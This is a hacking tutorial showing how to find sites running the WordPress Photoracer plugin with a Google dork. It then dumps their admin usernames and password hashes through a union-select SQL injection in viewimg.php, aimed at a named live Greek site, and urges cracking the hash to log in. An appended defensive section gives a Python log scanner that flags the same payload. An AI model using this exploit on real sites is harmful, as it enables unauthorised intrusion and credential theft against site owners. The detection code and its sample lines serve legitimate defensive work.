- inurl:"wp-content/plugins/photoracer/viewimg.php?id="
- and I'm going to test one of them, for example this one found in Google:
- http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=2
- We are going to add the exploit. This is the exploit:
- /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
- and the site looks like this:
- http://www.badged.gr/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
- Now you can see the user and pass :D! Just crack the hash and it's done.
- The admin panel is:
- http://Site/wp-login.php
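
On the defending side, the request shown above stands out in web server access logs, because the `id` parameter of `viewimg.php` normally carries a plain integer (as in `id=2`). The following is an added example, not part of the original paste: it flags any `viewimg.php` request whose `id` is not an integer. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

PLUGIN_PATH = "/wp-content/plugins/photoracer/viewimg.php"

# SQL keywords named in the alert for triage only; the integer check is the real test.
SQL_HINTS = re.compile(r"\b(union|select|concat|from|wp_users)\b", re.I)


def check_line(line):
    """Return an alert dict if the line is a viewimg.php request with a non-integer id, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.lower().endswith(PLUGIN_PATH):
        return None
    # parse_qs decodes %xx and '+', so encoded payloads are compared in plain form.
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
    bad = [v for v in ids if not re.fullmatch(r"\d{1,10}", v)]
    if not bad:
        return None
    hints = sorted({h.lower() for v in bad for h in SQL_HINTS.findall(v)})
    return {"ip": m.group("ip"), "status": int(m.group("status")), "id": bad[0], "sql_keywords": hints}


def scan(lines):
    return [a for a in map(check_line, lines) if a]


# Constructed sample log lines (documentation IP ranges, no real host).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

A 200 status on a flagged request is a reason to review the response size and rotate WordPress credentials. The same integer-only rule is what the plugin should enforce before the value reaches the query.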